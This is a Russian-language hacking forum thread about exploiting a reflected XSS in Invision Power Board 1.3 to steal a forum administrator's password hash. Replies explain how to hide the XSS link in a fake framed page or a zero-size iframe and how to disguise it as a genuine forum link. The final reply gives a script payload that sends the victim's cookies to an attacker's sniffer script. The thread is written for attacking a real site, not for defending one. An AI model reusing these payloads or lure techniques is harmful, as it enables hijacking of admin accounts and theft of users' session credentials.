|
Вопрос про использование xss в Invision Power Board 1.3(U) Final
Кароче есть сайт http://victim.com/
На нём расположен форум Invision Power Board 1.3(U) Final Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext> Пожалуйста объясните как я могу заполучить хэш админа. Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять... |
Что-то сайт какой-то странный, рисуночек такой "Go Away!"
|
WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
... Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS. |
Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой: Цитата:
Цитата:
... Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться. |
в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.
|
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши |
Цитата:
|
Вы от куда попадали ? тутанхамоны наши =)
|
хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss :D. Не пинайте сильно :). Если админ лох - прокатит :)
|
| Время: 12:32 |